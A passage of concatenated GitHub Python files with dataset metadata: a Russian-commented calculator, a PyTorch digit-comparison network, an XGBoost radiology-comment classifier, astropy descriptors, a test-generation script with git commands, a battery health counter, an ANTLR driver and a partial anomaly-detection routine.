\nm3 = [] # применяется в решение выражения в скобках\n\nbracket = False # флаг скобки\nbracket_count = 0 # для подсчета знаков в скобке\nbracket_start = 0\nmultiply = False # флаг умножения/деления\nnew_object = True # флаг начала\ntemp = 0\n\n# _______вспомогательные функции____________\n\ndef calc_expression(a, b, oper):\n\tif oper == '+':\n\t\treturn (a + b)\n\tif oper == '-':\n\t\treturn (a - b)\n\tif oper == '*':\n\t\treturn (a * b)\n\tif oper == '/':\n\t\treturn (a / b)\n\t\t\ndef multiplication_calculation(m, multiply, new_object):\n# проверяем есть ли * или /\n for i in range(1, len(m) - 1, 2): # убрал len(m) - 1\n# выполняется если в выражении последующее действие * или /\n if m[i] == '*' and multiply == True or m[i] == '/' and multiply == True: \n temp = calc_expression(temp, int(m[i + 1]), m[i])\n m2.pop(-1) # удаляем последний знак\n m2.append(temp) # добавляем число\n multiply = True \n# выполняется если в выражении первое действие * или /\n elif m[i] == '*' and multiply == False or m[i] == '/' and multiply == False: \n if new_object == True: # если это начало то очистим массив\n m2.clear()\n new_object = False\n temp = calc_expression(int(m[i - 1]), int(m[i + 1]), m[i])\n m2.append(temp) # добавляем число\n multiply = True \n# выполняется после операций уножения или деления (если действие + или - после * или /)\n elif m[i] != '*' and multiply == True and i + 2 != len(m) or m[i] != '/' and multiply == True and i + 2 != len(m):\n multiply = False\n m2.append(m[i]) # просто ставлю 
знак\n# проверка начала выражения\n elif i == 1 and multiply == False: \n m2.clear() # сначало очистим массив\n new_object = False\n m2.append(int(m[0]))\n m2.append(m[i])\n# проверка конца выражения 1 сценарий (если последнее действие + или - после * или / в конце выражения )\n elif i + 2 == len(m) and m[i] != '*' and multiply == True or i + 2 == len(m) and m[i] != '/' and multiply == True: \n m2.append(m[i])\n m2.append(int(m[i + 1]))\n# проверка конца выражения 2 сценарий (если последнее действие + или - в конце выражения)\n elif i + 2 == len(m) and m[i] != '*' or i + 2 == len(m) and m[i] != '/': \n m2.append(int(m[i - 1]))\n m2.append(m[i])\n m2.append(int(m[i + 1]))\n# если в предыдущем действие нет * или / \n# и это небыло мульти циклом этих действий\n elif multiply == False:\n m2.append(int(m[i - 1])) # ставлю предыдущее число \n m2.append(m[i]) # ставлю знак \"шага\"\n multiply = False\n if len(m) == 3 and len(m2) == 2:\n m2.append(int(m[i + 1]))\n return m2\n\n# _______тело программы____________________\n#ищю скобку и записываю выражение в новый массив\nfor i in range(0, len(m) - 1):\n if m[i] == '(':\n bracket_start = i\n bracket = True\n m3.clear()\n if m[i] == ')': \n bracket = False\n if bracket == True and m[i] != '(': \n m3.append(m[i])\n bracket_count += 1\n# убраем из первичного массива выражение в скобках\nif bracket_count != 0 and m3 != None: \n i = 0\n while i < bracket_count + 2: # двойка чтобы убрать скобки\n m.pop(bracket_start)\n i += 1\n # print(m)\n m3 = multiplication_calculation(m3, multiply, new_object)\n# вычисляю скобку и полученное значение записываем в начало массива \nif bracket_count != 0 and len(m3) > 1:\n temp = calc_expression(m3[0], m3[2], m3[1])\n for i in range(4, len(m3), 2):\n temp = calc_expression(temp, m3[i], m3[i - 1])\n m.insert(bracket_start, temp)\n m3.clear()\n #print(m)\nelif bracket_count == 0 and len(m3) == 1:\n m.insert(0, temp)\n m3.clear()\n #print(m)\n \n#print (m)\nm = multiplication_calculation(m, multiply, new_object)\n#print (m)\n# обобщение полученых вычислений\nif len(m) > 1:\n temp = calc_expression(m[0], m[2], m[1])\n for i in range(4, len(m), 2):\n temp = calc_expression(temp, m[i], m[i - 1])\nelse:\n temp = m[0]\nprint(f'\\nРезультат вычисления выражения: {n} = {temp}\\n')\n\n","repo_name":"AlexK1r/pyton_examples","sub_path":"helloPython/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":5991,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13984806240","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[13]:\n\n\nimport torch\nimport math\nimport datetime\nimport time\nimport numpy as np\nfrom torch import optim\nfrom torch import Tensor\nfrom torch.autograd import Variable\nfrom torch import nn\nfrom torch.nn import functional as F\nimport torch.nn as nn\nimport dlc_practical_prologue \nimport matplotlib.pyplot as plt\nimport warnings\nfrom random import seed\nfrom random import randint\n\n\n# # Creating Convolutional network\n\n# In[28]:\n\n\nclass Conv_Net(nn.Module):\n '''\n Creating the class for the convolutional net. 
The kernel size, stride and padding are chosen such as to have approximately \n 70 000 parameters in total.\n\n '''\n def __init__(self, nb_hidden):\n super(Conv_Net, self).__init__()\n self.layer1 = nn.Sequential(\n nn.Conv2d(1, 32, kernel_size=3, stride=2, padding=2), #Convolutional layer \n nn.ReLU(), #ReLU activation\n nn.MaxPool2d(kernel_size=3, stride=2)) #Pooling layer\n self.layer2 = nn.Sequential(\n nn.Conv2d(32, 64, kernel_size=3, stride=2, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2))\n \n self.fc1 = nn.Linear(64, nb_hidden) #Fully Connected layers\n self.fc2 = nn.Linear(nb_hidden, 10)\n \n #Recreating all layers in order not to have weight sharing\n \n self.layer1_noWS = nn.Sequential(\n nn.Conv2d(1, 32, kernel_size=3, stride=2, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2))\n self.layer2_noWS = nn.Sequential(\n nn.Conv2d(32, 64, kernel_size=3, stride=2, padding=2),\n nn.ReLU(),\n nn.MaxPool2d(kernel_size=3, stride=2))\n \n self.fc1_noWS = nn.Linear(64, nb_hidden) \n self.fc2_noWS = nn.Linear(nb_hidden, 10)\n \n self.layer1_Comp = nn.Linear(20, 100) #Layers for digit comparison\n self.relu = nn.ReLU()\n self.layerh_Comp = nn.Linear(100, 100)\n self.layer2_Comp = nn.Linear(100, 2)\n\n def forward(self, option_ws, train_input):\n img1 = train_input.narrow(1,0,1) #Extracting the first image\n img2 = train_input.narrow(1,1,1) #Extracting the second image\n \n x1 = self.layer1(img1) #Processing the images in the neural network\n x1 = self.layer2(x1)\n x1 = x1.reshape(x1.size(0), -1)\n x1 = self.fc1(x1)\n x1 = self.fc2(x1)\n \n if option_ws == \"no_weight_sharing\": #No weight sharing: img2 uses different layers than img1\n x2 = self.layer1_noWS(img2)\n x2 = self.layer2_noWS(x2)\n x2 = x2.reshape(x2.size(0), -1)\n x2 = self.fc1_noWS(x2)\n x2 = self.fc2_noWS(x2)\n elif option_ws == \"weight_sharing\": #Weight sharing: img2 uses the same layers as img1\n x2 = self.layer1(img2)\n x2 = self.layer2(x2)\n x2 = x2.reshape(x2.size(0), -1)\n x2 = self.fc1(x2)\n x2 = self.fc2(x2)\n else :\n return \"Please choose the type of convolutional network you would like to use: 'weight_sharing' or 'no_weight_sharing'.\"\n \n z = torch.cat((x1,x2),1) #Concatenating x and y\n z = self.layer1_Comp(z)\n z = self.relu(z)\n z = self.layerh_Comp(z)\n z = self.relu(z)\n z = self.layer2_Comp(z) #Result of the comparison\n \n \n return x1, x2, z\n\n\ndef count_parameters(model): \n '''\n Function that counts the nuber of parameters in the convolutional net\n input: model - the neural network used\n output: nb_param - the number of parameters in the neural network\n ''' \n nb_param = sum(p.numel() for p in model.parameters() if p.requires_grad)\n return nb_param\n\n\n# # Training the convolutional network\n\n# In[23]:\n\n\ndef compute_error_rate(option_ws, option_err, model, input_img, input_target):\n '''\n Function that computes the error rate with an option to compute error rate of images or direct comparison.\n input: option_err - choice for computing the error rate of the images or the prediction of the direct comparison\n option_ws - choice for using the neural network with or without weight sharing\n model - the neural network\n input_img - the two images\n input_target - the real comparison\n output: error_rate - the error rate as calculated according to the option chosen\n '''\n size = input_img.size(0)\n img1, img2, comp = model(option_ws, input_img)\n \n if option_err == \"images\":\n _, number1 = torch.max(img1, 1)\n _, number2 = torch.max(img2, 1)\n predicted = 
(number1 <= number2)\n error_rate = (torch.sum(input_target != predicted).item()/size)*100\n \n elif option_err == \"outcome\":\n _, isbigger = torch.max(comp, 1) \n error_rate = (torch.sum(input_target != isbigger).item()/size)*100\n else :\n return \"Please choose the type of error rate you would like to calculate: 'images' or 'outcome'.\"\n return error_rate\n\n\n# In[30]:\n\n\ndef train_model(option_ws, option_loss, model, train_input, train_target, test_input, test_target,\\\n batch_size, learning_rate, nb_epochs, train_classes, test_classes):\n '''\n Function that trains the neural network. Option to calculate the loss in an auxiliary manner or only based on the outcome.\n input: option_ws - choice for using the neural network with or without weight sharing\n option_loss - choice for calculating the loss in an auxiliary manner or only based on the comparison\n model - the neural network\n train_input - the train input generated by the generate_pair_sets function\n train_target - the train target generated by the generate_pair_sets function\n test_input - the test input generated by the generate_pair_sets function\n test_target - the test target generated by the generate_pair_sets function\n output: loss_array - an array with all the calculated losses\n test_err1 - the test error for the comparison by images\n test_err2 - the test error for the direct comparison\n train_err1 - the train error for the comparison by images\n train_err2 - the train error for the direct comparison\n '''\n criterion = nn.CrossEntropyLoss() #Criterion for loss calculation\n optimizer = optim.SGD(model.parameters(), lr = learning_rate)\n loss_array = []\n test_err1 = [] #Test error based on the images\n test_err2 = [] #Test error based on the outcome\n train_err1 = [] #Train error based on the images\n train_err2 = [] #Train error based on the outcome\n\n #Looping on the number of epochs\n for e in range(nb_epochs):\n start_time = time.time() #Calulating time for one round\n loss_sum = 0\n for b in range(0, train_input.size(0), batch_size):\n \n #Loss calculations using the chosen criterion\n img1, img2, comp = model(option_ws, train_input.narrow(0, b, batch_size))\n loss_img1 = criterion(img1, train_classes.narrow(0, b, batch_size).narrow(1,0,1).view(-1))\n loss_img2 = criterion(img2, train_classes.narrow(0, b, batch_size).narrow(1,1,1).view(-1))\n loss_comp = criterion(comp, train_target.narrow(0, b, batch_size))\n if option_loss == \"auxiliary\":\n loss_final = loss_img1 + loss_img2 + loss_comp #Auxiliary loss \n elif option_loss == \"no_auxiliary\":\n loss_final = loss_comp\n else:\n return \"Please choose the type of loss you would like to use: 'auxiliary' or 'no_auxiliary'.\"\n model.zero_grad()\n loss_final.backward()\n optimizer.step()\n loss_sum += loss_final.item()\n loss_array.append(loss_sum)\n \n #Putting the error rates in the correspondent arrays\n \n test_err1.append(compute_error_rate(option_ws, \"images\", model, test_input, test_target))\n test_err2.append(compute_error_rate(option_ws, \"outcome\", model, test_input, test_target))\n train_err1.append(compute_error_rate(option_ws, \"images\", model, train_input, train_target))\n train_err2.append(compute_error_rate(option_ws, \"outcome\", model, train_input, train_target))\n \n end_time = time.time()\n time_elapsed = end_time-start_time\n print('\\nElapsed time for training :{}'.format(time_elapsed))\n \n return loss_array, test_err1, test_err2, train_err1, train_err2\n\n\n# # Printing and plotting values\n\n# In[31]:\n\n\ndef 
print_values(nb_epochs, loss_array, test_err1, test_err2, train_err1, train_err2):\n '''\n Function that prints the error rate values for every round\n input: nb_epochs - the number of epochs used for one round\n round - the current round\n loss_array - an array with all the calculated losses\n test_err1 - the test error for the comparison by images\n test_err2 - the test error for the direct comparison\n train_err1 - the train error for the comparison by images\n train_err2 - the train error for the direct comparison\n '''\n loss_array = np.array(loss_array).round(3)\n test_err1 = np.array(test_err1).round(3)\n test_err2 = np.array(test_err2).round(3)\n train_err1 = np.array(train_err1).round(3)\n train_err2 = np.array(train_err2).round(3)\n \n print('\\nLoss array for {} epochs : \\n'.format(nb_epochs))\n print(*loss_array, sep = \" / \")\n print('\\nTest error rate for images : \\n')\n print(*test_err1, sep = \" / \" )\n print('\\nTest error rate for outcome : \\n')\n print(*test_err2, sep = \" / \" )\n print('\\nTrain error rate for images \\n')\n print(*train_err1, sep = \" / \" )\n print('\\nTrain error rate for outcome : \\n')\n print(*train_err2, sep = \" / \" )\n\ndef plot_error_rate(test_err1, test_err2, train_err1, train_err2):\n '''\n A function that plots the error rate over epochs\n input: test_err1 - the test error for the comparison by images\n test_err2 - the test error for the direct comparison\n train_err1 - the train error for the comparison by images\n train_err2 - the train error for the direct comparison\n '''\n lines = plt.plot(test_err1, 'r', test_err2, 'r--', train_err1, 'b', train_err2, 'b--')\n plt.ylabel('Error rate')\n plt.xlabel('Epochs')\n plt.title(\"Test error in red, train error in blue\")\n plt.legend(iter(lines), ('Test error images', 'Test error outcome', 'Train error images', 'Train error outcome'))\n plt.show()\n\n\n# # Computing and printing mean and standard deviation\n\n# In[32]:\n\n\ndef plot_results(test_err1_array, test_err2_array, train_err1_array, train_err2_array):\n '''\n A function that computes the mean standard deviation for the test and train errors\n input: test_err1_array - the array of the test errors for the comparison by images\n test_err2_array - the array of the test errors for the direct comparison\n train_err1_array - the array of the train errors for the comparison by images\n train_err2_array - the array of the train errors for the direct comparison\n '''\n \n lines = plt.plot(test_err1_array, 'r', test_err2_array, 'r--', train_err1_array, 'b', train_err2_array, 'b--')\n plt.ylabel('Error rate')\n plt.xlabel('Rounds')\n plt.title(\"Test and train errors based on images and outcome\")\n plt.legend(iter(lines), ('Test error images', 'Test error outcome', 'Train error images', 'Train error outcome'))\n plt.show()\n \n test_err1_mean = np.mean(test_err1_array)\n test_err2_mean = np.mean(test_err2_array)\n train_err1_mean = np.mean(train_err1_array)\n train_err2_mean = np.mean(train_err2_array)\n \n test_err1_std = np.std(test_err1_array)\n test_err2_std = np.std(test_err2_array)\n train_err1_std = np.std(train_err1_array)\n train_err2_std = np.std(train_err2_array)\n\n print('Test error based on images : \\n mean : {:.3f} - standard deviation : {:.3f}'.format(test_err1_mean, test_err1_std))\n print('Test error based on outcome : \\n mean : {:.3f} - standard deviation : {:.3f}'.format(test_err2_mean, test_err2_std))\n print('Train error based on images : \\n mean : {:.3f} - standard deviation : {:.3f}'.format(train_err1_mean, 
train_err1_std))\n print('Train error based on outcome : \\n mean : {:.3f} - standard deviation : {:.3f}'.format(train_err2_mean, train_err2_std))\n\n\n\n\n\n\n\n","repo_name":"nek11/Projects","sub_path":"Proj1/Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":13188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"19867088349","text":"from sentence_transformers import SentenceTransformer\nfrom sklearn.metrics import cohen_kappa_score\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn import linear_model\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport scipy\nfrom sklearn.metrics import log_loss\nimport xgboost as xgb\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import roc_auc_score\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import f1_score, classification_report, accuracy_score\nfrom sklearn.ensemble import RandomForestClassifier\n# RegEx for removing non-letter characters\nimport re\nimport csv\n# NLTK library for the remaining steps\nimport nltk\nnltk.download(\"stopwords\") # download list of stopwords (only once; need not run it again)\nfrom nltk.corpus import stopwords # import stopwords\nimport sys\nfrom nltk.stem.porter import *\nimport pickle\n\nstemmer = PorterStemmer()\ndef review_to_words(review):\n # TODO: Remove HTML tags and non-letters,\n #soup = BeautifulSoup(review, 'html5lib')\n text = review.lower()\n # convert to lowercase, tokenize,\n text = re.sub(r\"[^a-zA-Z0-9]\", ' ', text.lower())\n words = text.split()\n # remove stopwords and stem\n words = [w.strip() for w in words if w not in stopwords.words('english')]\n words = [stemmer.stem(w) for w in words]\n\n # Return final list of words\n return ' '.join(words)\n\n\n\n\nclass radiologyretive(object):\n def __init__(self):\n self.LMmodel = SentenceTransformer('all-mpnet-base-v2')\n self.xgb_model = {}\n self.labels = None\n\n def encode(self, sentences):\n return self.LMmodel.encode(sentences)\n def train_main(self, traindf, testdf, labels):\n ##load pretarined model \n self.labels = labels\n try:\n traindf =traindf.fillna(' ')\n traindf['Comments_proc'] = traindf['Comments'].apply(review_to_words)\n testdf =testdf.fillna(' ')\n testdf['Comments_proc'] = testdf['Comments'].apply(review_to_words)\n except:\n sys.exit('Please provide a file with Comments')\n if any(item not in traindf.columns for item in labels) and any(item not in testdf.columns for item in labels):\n sys.exit('Please provide a correct labels in the train and test file')\n print('Training and validation file read')\n train_sentence_embeddings = self.encode(traindf['Comments'])\n test_sentence_embeddings = self.encode(testdf['Comments'])\n gt = []\n pred = []\n legend = []\n print(self.labels)\n for l in self.labels:\n try:\n y_train = traindf[l].values\n y_valid = testdf[l].values\n self.xgb_model[l] = xgb.XGBClassifier(objective='binary:logistic', eta=0.3, silent=1, subsample=0.8, scale_pos_weight=99).fit(train_sentence_embeddings, y_train) \n xgb_prediction = self.xgb_model[l].predict_proba(test_sentence_embeddings)\n print(l)\n print(classification_report(y_valid, self.xgb_model[l].predict(test_sentence_embeddings)))\n gt.append(y_valid)\n pred.append(self.xgb_model[l].predict_proba(test_sentence_embeddings))\n legend.append(l)\n print('-------------------------------------------------')\n except:\n 
self.xgb_model[l] = 'Null'\n print('Didnot work: '+l)\n\n def test_main(self, test):\n try:\n test =test.fillna(' ')\n test['Comments_proc'] = test['Comments'].apply(review_to_words)\n except:\n sys.exit('Please provide a file with Comments')\n pred_dyn = []\n test_sentence_embeddings = self.encode(test['Comments'])\n flg = []\n for l in self.labels:\n try:\n pred_dyn.append(self.xgb_model[l].predict(test_sentence_embeddings))\n except:\n flg.append(l)\n pred_dyn.append([0] * test_sentence_embeddings.shape[0])\n print('Didnot work: '+l)\n for i in range(len(self.labels)):\n if self.labels[i] not in flg:\n test[self.labels[i]] = pred_dyn[i]\n return test\n\n def getList(self, dict):\n return list(dict.keys())\n\n \n def model_load(self, modelpath):\n #try:\n self.xgb_model = pickle.load(open(modelpath+'LMXgboost.sav', 'rb'))\n self.labels = self.getList(self.xgb_model)\n print('Model loaded!!')\n #except:\n # sys.exit('Model couldn\\'t be loaded')\n\n def model_save(self, modelpath):\n try:\n pickle.dump(self.xgb_model, open(modelpath+'LMXgboost.sav', 'wb'))\n print('Model saved!!')\n except:\n print('Model saving didn\\'t worked')\n","repo_name":"imonban/RadiologyFeedback","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"23950965788","text":"from astropy.time import Time\nfrom astropy import units as u\nfrom decimal import Decimal, InvalidOperation\n\nclass Time(object):\n \"\"\"An astropy time property\"\"\"\n\n def __init__(self, data, key, time_format):\n \"\"\"Initialize a TimeProperty instance by saving the raw value of\n data[key] to this class. We will compute the actual time object only on\n demand.\n\n Args:\n data: a dictionary containing many keys including the expected key\n key: a string key expected to exist in data\n time_format: a string indicating format of the time anticipated in\n the data dictionary, see the astropy.time docs for appropriate\n time formats:\n http://docs.astropy.org/en/stable/api/astropy.time.Time.html\n \"\"\"\n self.value = None\n self._raw_value = data.get(key, None)\n self._time_format = time_format\n\n def __get__(self, instance, owner):\n \"\"\"Only when the value of the instance is requested is the time object\n created. After it is created it is saved to self.value so that it does\n not have to be calculated again.\n\n Returns:\n an astropy.Time object\n \"\"\"\n if not self.value:\n self.value = self._create_time()\n return self.value\n\n def _create_time(self):\n \"\"\"Create an astropy.Time object from the raw value and time format\n saved to the instance.\n\n Returns:\n an astropy.Time object\n \"\"\"\n return Time(self._raw_value, format=self._time_format)\n\n\nclass Quantity(object):\n \"\"\"A Quantity property - something with value an units\"\"\"\n\n def __init__(self, data, key, units=None):\n \"\"\"Initialize the Quantity property instance by saving the raw value\n of data[key] to this instance. 
We will calculate the actual Quantity\n only on demand\n\n Args:\n data: a dictionary containing many keys including the expected key\n key: a string key expected to exist in data\n unit_format: a string key denoting the appropriate units to use\n \"\"\"\n self.value = None\n self._raw_value = data.get(key, None)\n self._units = units\n\n def __get__(self, instance, owner):\n if not self.value:\n self.value = self._create_quantity()\n return self.value\n\n def _create_quantity(self):\n \"\"\"Create an astropy.Quantity instnace by multiplying a decimal\n representation of the raw value with the astropy.units object\n associated with this instance.\n\n Returns:\n an astropy.Quantity object or None if it cannot be created from\n the known values\n \"\"\"\n try:\n if self._units:\n return Decimal(self._raw_value) * self._get_astropy_units()\n else:\n return Decimal(self._raw_value)\n except (InvalidOperation, TypeError):\n return None\n\n def _get_astropy_units(self):\n \"\"\"Return the appropriate astropy units object\"\"\"\n valid_units = {\n 'yr': u.yr,\n 'AU': u.AU,\n 'km': u.km,\n 'deg': u.deg,\n 'deg/day': u.deg / u.d\n }\n return valid_units.get(self._units, None)\n\n\nclass BooleanFlag(object):\n \"\"\"Returns a simple boolean value based on the raw input\"\"\"\n\n def __init__(self, data, key):\n self.value = None\n self._flag = data.get(key, None)\n\n def __get__(self, instance, owner):\n if self.value is None:\n self.value = self._flag == 1\n return self.value\n","repo_name":"qdonnellan/mpc-client","sub_path":"mpc_client/properties.py","file_name":"properties.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"41418534445","text":"# keep the python package and codegen package separate\nimport argparse\nimport json\nimport os\n\nimport get_stage_attributes\nimport read_input_data\nimport integrate_functions\nfrom loggerUtility import logger\nfrom utility_functions import get_start_and_end_line_number_of_tc, check_word\nfrom UserSetiing import DataCollectorPath\nfrom utility_functions import create_git_branch\n\n\n# Reading test case file name and arguments from command line\n# only run if below modules are the entry point to the program. Restricting access to other module\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('git_branch', help='GitBranch, please provide git branch ')\n parser.add_argument('file_name', help='StageName, please provide file name')\n parser.add_argument('test_cases', nargs='*', help='TestCaseNames, please provide test case name')\n args = parser.parse_args()\n git_branch = args.git_branch\n file_name = args.file_name\n test_cases = args.test_cases\n\n file_path = f'{DataCollectorPath}/stage/configuration/{file_name}'\n\n # If no test_cases are provided from command line, then script will check for all the test cases in the file.\n if len(test_cases) == 0:\n with open(file_path, 'r') as file:\n lines = file.readlines()\n all_test_cases = check_word(lines, 'def test')[2]\n all_test_cases = ['test_' + tc.split('(')[0][len('def test') + 1:] for tc in all_test_cases]\n test_cases = all_test_cases\n # Finding valid test cases i.e. 
test case should be present in both the stage file and input_file.json\n with open('data/input_data.json', \"r\") as input_file:\n json_data = json.load(input_file)\n invalid_test_cases = list(set(test_cases) - set(list(json_data.keys())))\n # This second condition comes in handy when no test cases passed i.e. we need to check for all the test cases,\n # in case number of invalid_test_cases will be many so we are not logging anything.\n if len(invalid_test_cases) > 0 and len(args.test_cases) > 0:\n logger.info(f'Below test cases are not implemented in input file')\n print(invalid_test_cases)\n\n valid_test_cases = list(set(test_cases).intersection(set(list(json_data.keys()))))\n test_cases = valid_test_cases\n run_only_once = True\n is_error_occurred_in_creation_of_git_branch = True\n try:\n for test_case in test_cases:\n # Create branch only for valid test cases, i.e. calling create_git_branch function in for loop.\n if run_only_once:\n create_git_branch(git_branch)\n is_error_occurred_in_creation_of_git_branch = False\n # Read the stage file name for every test_case.\n with open(file_path, 'r') as f:\n lines = f.readlines()\n get_start_end_lines_of_tc_in_lines = get_start_and_end_line_number_of_tc(lines, test_case)\n _, start_line_no_of_tc_in_lines, end_line_no_of_tc_in_lines = get_start_end_lines_of_tc_in_lines\n # Extracting the required lines of test case from the entire file.\n tc_lines = lines[start_line_no_of_tc_in_lines:end_line_no_of_tc_in_lines]\n len_tc_lines = len(tc_lines)\n # Remove empty line(2 extra lines after pass) in the gathered test case lines\n while len_tc_lines > 0:\n if tc_lines[len_tc_lines-1] == '\\n':\n tc_lines.pop(len_tc_lines-1)\n else:\n break\n len_tc_lines -= 1\n # Extracting the stage attributes from the parametrize statements.\n unique_attributes = get_stage_attributes.get_stage_attributes(tc_lines, test_case,\n \"@pytest.mark.parametrize('stage_attributes'\")\n\n output_from_read_input_data_from_json_file = read_input_data.read_input_data_from_json_file(\n 'data/input_data.json', test_case)\n integrate_functions.integrate_test_case(run_only_once, file_name, lines, tc_lines,\n test_case, get_start_end_lines_of_tc_in_lines,\n output_from_read_input_data_from_json_file)\n run_only_once = False\n except Exception as error:\n # if any exception occurs above (such as file not found) then this flag will be set to True\n logger.exception(error)\n # if any exception occurs above, before this any part of the code already write to file name then, delete the\n # git branch.\n if not is_error_occurred_in_creation_of_git_branch:\n os.chdir(f'{DataCollectorPath}')\n os.system('git checkout -- .')\n os.system('git checkout master')\n os.system(f'git branch -D {git_branch}')\n logger.info(f'git branch {git_branch} has been deleted')\n","repo_name":"khushbutal/configure_for_environment_poc","sub_path":"main_poc.py","file_name":"main_poc.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70400247927","text":"\ndef count_batteries_by_health(present_capacities):\n counts = {\n \"healthy\": 0,\n \"exchange\": 0,\n \"failed\": 0\n }\n\n for present_capacity in present_capacities:\n SoH = 100 * present_capacity/120\n #classification of the ranges\n if SoH <= 100 and SoH > 80:\n counts[\"healthy\"] += 1\n elif 63 <= SoH <= 80:\n counts[\"exchange\"] += 1\n else:\n counts[\"failed\"] += 1\n \n return counts\n\ndef test_bucketing_by_health():\n print(\"Counting batteries by 
SoH...\\n\")\n present_capacities = [113, 116, 80, 95, 92, 70]\n counts = count_batteries_by_health(present_capacities)\n assert(counts[\"healthy\"] == 2)\n assert(counts[\"exchange\"] == 3)\n assert(counts[\"failed\"] == 1)\n print(\"Done counting :)\")\n\n\nif __name__ == '__main__':\n test_bucketing_by_health()\n","repo_name":"assignments-for-discussion/battery-inventory-in-py-varuni-kulkarni","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3604451253","text":"\"\"\"\nMain script for grammar Expr2\n\n\"\"\"\n\n__version__ = '0.1.1'\n__author__ = 'Ali'\n\n\nfrom antlr4 import *\n\nfrom Code.CustomTypeCheckerListener import CustomTypeCheckerListener\nfrom gen.TypeCheckerLexer import TypeCheckerLexer\nfrom gen.TypeCheckerParser import TypeCheckerParser\n\n# Step 0: Give an input\ninput_string = '2+3*3.9'\n\n# Step 1: Convert input to a byte stream\nstream = InputStream(input_string)\n# Step 2: Create lexer\nlexer = TypeCheckerLexer(stream)\n# Step 3: Create a list of tokens\ntoken_stream = CommonTokenStream(lexer)\n# Step 4: Create parser\nparser = TypeCheckerParser(token_stream)\n# Step 5: Create parse tree\nparse_tree = parser.start()\n\n# Step 6: Adding a listener\nmy_listener = CustomTypeCheckerListener()\n\n\nwalker = ParseTreeWalker()\ntry:\n walker.walk(listener=my_listener, t=parse_tree)\nexcept Exception as e:\n print(e)\n","repo_name":"AliKhodaaei/AntlrTypeChecker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18643991080","text":"import pandas as pd\nimport time\nimport anomaly_detection_methods_helpers as ah\nimport matplotlib.pyplot as plt\nimport sys \nsys.path.append(\"../characteristics\") \nimport characteristics_helpers as ch\nimport numpy as np\nfrom tqdm import tqdm\nfrom sklearn.metrics import mean_squared_error\n\ndef glim(ts_obj, gaussian_window_size, step_size, family='gaussian', eta=1.0, lambda_=0.9999, plot_anomaly_score=False, plot_forecast=False, grid_search_mode=False):\n \"\"\"\n Invokes GLiM.\n\n :param ts_obj\n TimeSeries object\n :param gaussian_window_size:\n Gaussian window size for creating anomaly scores\n :param step_size:\n Step size for creating anomaly scores\n :param plot_anomaly_scores:\n Plot anomaly scores if True\n :param plot_forecast:\n Plot predictions vs observations if True\n \"\"\"\n start = time.time()\n # there are missing time steps. 
fill them with NaNs\n if ts_obj.miss:\n ref_date_range = ch.get_ref_date_range(ts_obj.dataframe, ts_obj.dateformat, ts_obj.timestep)\n gaps = ref_date_range[~ref_date_range.isin(ts_obj.dataframe[\"timestamp\"])]\n filled_df = ch.fill_df(ts_obj.dataframe, ts_obj.timestep, ref_date_range, \"fill_nan\")\n endog = filled_df.set_index('timestamp')['value']\n exog = ah.get_exogenous(endog, ts_obj.get_dateformat())\n else:\n endog = ts_obj.dataframe.set_index('timestamp')['value']\n exog = ah.get_exogenous(endog, ts_obj.get_dateformat())\n \n # use entire time series for training\n full = ts_obj.get_length()\n initial_mean = endog.iloc[:full].mean()\n initial_stddev = endog.iloc[:full].std()\n results = online_glim(endog, exog, family=family, eta=eta, lambda_=lambda_, initial_loc=initial_mean, initial_scale=initial_stddev, save_precision=True)\n\n if ts_obj.miss:\n\n filled_results_predictions_values = []\n for item in results.predictions.values:\n if item != item:\n filled_results_predictions_values.append(0)\n else:\n filled_results_predictions_values.append(item)\n\n filled_results_errors_values = []\n for item in results.errors.values:\n if item != item:\n filled_results_errors_values.append(0)\n else:\n filled_results_errors_values.append(item)\n\n\n filled_df[\"results_predictions\"] = filled_results_predictions_values\n filled_df[\"results_errors_values\"] = filled_results_errors_values\n filled_df = filled_df.dropna()\n results_predictions = filled_df[\"results_predictions\"].values\n results_errors_values = filled_df[\"results_errors_values\"].values\n else:\n results_predictions = results.predictions.values\n results_errors_values = results.errors.values\n\n if grid_search_mode:\n\n if plot_forecast:\n plt.plot(list(results_predictions), label=\"Predictions\", alpha=.7)\n plt.plot(list(ts_obj.dataframe[\"value\"].values), label=\"Data\", alpha=.5)\n plt.legend()\n plt.show()\n \n rmse = mean_squared_error(ts_obj.dataframe[\"value\"].values, results_predictions, squared=False)\n print(\"RMSE: \", rmse)\n return rmse\n\n # print(len(results_errors_values))\n # print(full)\n # print(\"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\")\n\n anomaly_scores = ah.determine_anomaly_scores_error(\n results_errors_values, np.zeros_like(results_errors_values),\n full, gaussian_window_size, step_size)\n\n end = time.time()\n\n if plot_forecast:\n plt.plot(list(results_predictions), label=\"Predictions\", alpha=.7)\n plt.plot(list(ts_obj.dataframe[\"value\"].values), label=\"Data\", alpha=.5)\n plt.legend()\n 